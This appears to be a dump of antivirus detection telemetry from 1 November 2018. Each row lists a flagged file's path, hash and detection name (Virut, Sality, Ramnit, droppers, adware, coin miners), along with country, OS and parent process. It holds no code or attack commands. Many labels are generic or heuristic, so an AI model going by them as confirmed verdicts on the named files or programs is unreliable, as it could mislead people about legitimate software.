  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fudhallaj ïúó ßçóè.exe', filepath='C:\\Program Files (x86)\\FUDHALLAJ ÏÚÓ ßÇÓÈ.exe', filesize=192000, name='HEUR/AGEN.1014844.#M1.#R1'), hash='ed3cd68f7df781deec7353a6e71e54248dc961890081346da424a2ed2ccfe0eb', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\HDD Regenerator 2015 Incl Crack [daz]\\HDD Regenerator 2015 Incl Crack [daz]\\HDD Regenerator 2015.exe', parentsize=8324577, timestamp='2018-11-01T12:51:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='abaf41bff50a2a9c59b5609646c20b0a4f6fe287fc930192cd4f4e23fbf7ceab', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145454-3d943f81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_30cda9a5\\AVSCAN-20181101-064204-6F5AEFD4\\AVSCAN-20181101-145454-3D943F81', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:55:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clickjogos - superfighters.exe', filepath='C:\\Users\\X\\Downloads\\ClickJogos - Superfighters.exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='61ea9bec5db1e7e23c40c951a31a9a077dcc6fc1e4c39992f6effe6c4d6f8d71', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-01T00:13:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='\\\\?\\C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:23:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Zecminer\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='شركة البلاغة.exe', filepath='D:\\مجلد ملفات الشغل\\عروض أسعار\\الصور\\شركة البلاغة.exe', filesize=704000, name='TR/Dropper.Gen.#M300.#R3873'), hash='a5be1422a8630735450dcd31e04170a358a767998249ddec3eeb521e111c431a', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:43:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\BetwaypokerMPP\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Microgaming\\Poker\\BetwaypokerMPP\\mppoker.exe', parentsize=1214712, timestamp='2018-11-01T19:29:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\EA813CD4129DF283F7AE7BC890FD650FC1D876E20BE0E460ABA3EAC62A93EFC0', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:33:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Setup (1)\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Setup (1)\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T23:34:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184530-9a9b14d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a161568b\\AVSCAN-20181101-184513-97E01A21\\AVSCAN-20181101-184530-9A9B14D2', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:45:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-001402-bba1760f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235744-2DA07E8C\\AVSCAN-20181102-001402-BBA1760F', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:14:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195013-f158c4e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b59c424\\AVSCAN-20181101-194958-EE6059EA\\AVSCAN-20181101-195013-F158C4E2', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:50:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='f:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:00:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='elodrawmultimon.exe', filepath='C:\\Program Files\\Elo Touch Solutions\\EloDrawMultiMon.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='6fe70782008b47c5ca536cdac011b4fb40787feee4d8b9ec873879c303b33c75', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T22:33:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eularesit_it.dll', filepath='D:\\soft\\Adobe photoshop cs2\\AutoPlay\\eularesit_IT.dll', filesize=156000, name='W32/Ramnit.C.#M0.#R0'), hash='70095b2ca511dd564ae69e0923bb870d7818f6c6affa6d45f35ddc554b45a446', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002213-36c583f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002213-36C583F6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002139-3318f33e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002139-3318F33E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:08:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181736-07be5403', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_86d226a1\\AVSCAN-20181101-181659-02858138\\AVSCAN-20181101-181736-07BE5403', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:17:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1728000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='0540362667b4ac3c61dc10cbfd68cd8a5892742efd01d51eea64b16d859191e7', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T09:58:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='romstation.exe', filepath='C:\\RomStation\\RomStation.exe', filesize=512000, name='HEUR/AGEN.1000776.#M1.#R1'), hash='31501c80b272efcd7926bbf08b301be97ff1b9a67c7123a0ee9e8293ee914487', metadata=Row(cmdline='\\\\\\"170\\\\\\" \\\\\\"187\\\\\\" \\\\\\"http:\\\\\\/\\\\\\/www.romstation.fr\\\\\\/romstation\\\\\\/app\\\\\\/updates\\\\\\/\\\\\\"', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\RomStation\\Updater.exe', parentsize=278528, timestamp='2018-11-01T18:23:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002923-655086da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002923-655086DA', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:29:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='es.exe', filepath='F:\\New folder\\Corel Draw 12\\Apple\\ES\\ES.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4120c983faa1c641bae65541660e49d4a0105ecfd0b6662865a15e7c83294ea1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\4120C983FAA1C641BAE65541660E49D4A0105ECFD0B6662865A15E7C83294EA1', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4120c983faa1c641bae65541660e49d4a0105ecfd0b6662865a15e7c83294ea1', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:01:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='0184cd0a877d5d0d8c77734ed26e2b182e6052c03462dbd9b60a8c1ae5f97312', metadata=Row(cmdline='--engine=2 --session-id=1r\\\\\\/45vbNheB4DtDgQipJqQgI4aNf+V+PC0nD0pUS --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-01T19:25:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003540-8e29a332', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003540-8E29A332', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:35:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='asd.burger.bustle.by.midovd.exe', filepath='\\?\\J:\\العاب2\\لعبة مطعم البرجر\\ASD.Burger.Bustle.BY.midovd.exe', filesize=832000, name='W32/Tapin.#M1.#R1'), hash='80e20a96c601b2b5d5c318bf06fd76465fb5e9bff9117280d4e58c05172ca488', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:13:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodelaycomp.dll', filepath='C:\\Program Files\\FreeTime\\FormatFactory\\FFModules\\RMCodecs\\tools\\audiodelaycomp.dll', filesize=260000, name='W32/Ramnit.C.#M0.#R0'), hash='081783d17ee2a880340f207231a2aaa3ead3af4ad982dae9f1b71868c788c214', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T08:31:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T23:12:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:47:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a00b8fc140d2cca735298eb29fe55636a49c7d30', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\a00b8fc140d2cca735298eb29fe55636a49c7d30', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='60b7bb20b9a8a4074d137d89e7ef58646d1ac39fee6ef0c3b3d24f597818dc57', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:39:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094944-3b557da9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094944-3B557DA9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:49:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T08:11:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0064494.exe', filepath='H:\\System Volume Information\\_restore{0738878F-378D-4612-8350-34AD094C736F}\\RP257\\A0064494.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c0c958dd6dc1ac87b061972c14e5c09a131ecdb4dcc3e8f3407eb30b25b4371a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:19:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='animatore anziani.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\ANIMATORE ANZIANI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:56:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T15:51:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='be958e6543436dfb4fbf57f99545ca02cf178d9e656c0443da27ed7178f00d66', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-12.available\\Avira\\BE958E6543436DFB4FBF57F99545CA02CF178D9E656C0443DA27ED7178F00D66', filesize=384000, name='W32/Sivis.A.#M1.#R1'), hash='be958e6543436dfb4fbf57f99545ca02cf178d9e656c0443da27ed7178f00d66', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:35:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corsi nuovi definiitivi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI NUOVI DEFINIITIVI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150650-daebcd56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150650-DAEBCD56', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:06:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\1onum1p5wgf\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:46:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='putty.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\hourly.0\\Software\\OLD\\NetApp\\Putty\\putty.exe', filesize=512000, name='W32/Sality.Y.#M1.#R1'), hash='f36b6d1fcba331e24478910294eec7b1f989f8d79d97bfa15d6b246b09920cb0', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T09:51:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cc0478ea881650a4b1f1ed5e332aa9e91302e79913b1e9417754e4f55404512a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\CC0478EA881650A4B1F1ED5E332AA9E91302E79913B1E9417754E4F55404512A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cc0478ea881650a4b1f1ed5e332aa9e91302e79913b1e9417754e4f55404512a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rwafj2r', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RWAFJ2R', filesize=64000, name='VBA/Dldr.Agent.futat.#M1.#R1'), hash='8e0a02d2cf2f68a446cf6360b746631e4cc17e7db282d55b47e6a5fa279f734d', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\LPT\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='dae7701cb61c8ea6164d982c58b1bb2be2f065bb40bd02f419f3ec1a81ccea4b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:19:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='thlvqdim.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\ThLvQdIM.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pak fredy.exe', filepath='F:\\\xa0\\PAK FREDY\\PAK FREDY.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e6ab951b6fe0c7116d5843456775a41b665d63398437a396fd07b1576070658b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\E6AB951B6FE0C7116D5843456775A41B665D63398437A396FD07B1576070658B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e6ab951b6fe0c7116d5843456775a41b665d63398437a396fd07b1576070658b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:49:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.15063.0_none_e6376d51f3e7328e\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:24Z'), dt=datetime.date(2018, 11, 1)),
